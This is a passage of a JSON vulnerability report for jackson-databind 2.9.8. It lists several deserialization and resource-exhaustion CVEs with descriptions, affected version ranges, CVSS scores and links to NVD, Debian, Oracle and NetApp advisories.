serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36188"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36188"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36188/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10673"]}],"cve":"CVE-2020-10673","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:04","ids":[{"system_name":"CVE Record","text":"CVE-2020-10673"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 and 2.6.7.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10673"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10673"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.4"]}],"title":"CVE-2020-10673/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-24616"]}],"cve":"CVE-2020-24616","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:14:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-24616"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Code Injection in 
jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Code Injection in jackson-databind This project contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.6"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.6"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24616"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24616"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.6"]}],"title":"CVE-2020-24616/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11620"]}],"cve":"CVE-2020-11620","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T20:19:02","ids":[{"system_name":"CVE Record","text":"CVE-2020-11620"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"NetApp Advisory","text":"ntap-20200511-0004"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the 
interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11620"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11620"},{"summary":"NetApp Advisory ntap-20200511-0004","url":"https://security.netapp.com/advisory/ntap-20200511-0004"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11620/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14060"]}],"cve":"CVE-2020-14060","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:46","ids":[{"system_name":"CVE Record","text":"CVE-2020-14060"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability 
Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14060"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14060"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14060/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42003"]}],"cve":"CVE-2022-42003","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-10-03T00:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-42003"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"Gentoo Advisory","text":"glsa-202210-21"},{"system_name":"NetApp Advisory","text":"ntap-20221124-0004"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in Jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in Jackson-databind In FasterXML jackson-databind 2.4.0-rc1 until 2.12.7.1 and in 2.13.x before 2.13.4.2 resource exhaustion can occur because of a lack of a check in primitive value deserializers to 
avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. This was patched in 2.12.7.1, 2.13.4.2, and 2.14.0. Commits that introduced vulnerable code are https://github.com/FasterXML/jackson-databind/commit/d499f2e7bbc5ebd63af11e1f5cf1989fa323aa45, https://github.com/FasterXML/jackson-databind/commit/0e37a39502439ecbaa1a5b5188387c01bf7f7fa1, and https://github.com/FasterXML/jackson-databind/commit/7ba9ac5b87a9d6ac0d2815158ecbeb315ad4dcdc. Fix commits are https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea and https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.4.0-rc1|<2.12.7.1"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.12.7.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42003"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42003"},{"summary":"Gentoo Advisory glsa-202210-21","url":"https://security.gentoo.org/glsa/202210-21"},{"summary":"NetApp Advisory ntap-20221124-0004","url":"https://security.netapp.com/advisory/ntap-20221124-0004"},{"summary":"Debian Advisory 
dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.4.0-rc1|<2.12.7.1"]}],"title":"CVE-2022-42003/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36184"]}],"cve":"CVE-2020-36184","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:26","ids":[{"system_name":"CVE Record","text":"CVE-2020-36184"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, 
related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36184"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36184"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36184/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14195"]}],"cve":"CVE-2020-14195","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:43","ids":[{"system_name":"CVE Record","text":"CVE-2020-14195"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to 
org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14195"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14195"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14195/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9548"]}],"cve":"CVE-2020-9548","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:59:01","ids":[{"system_name":"CVE Record","text":"CVE-2020-9548"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory 
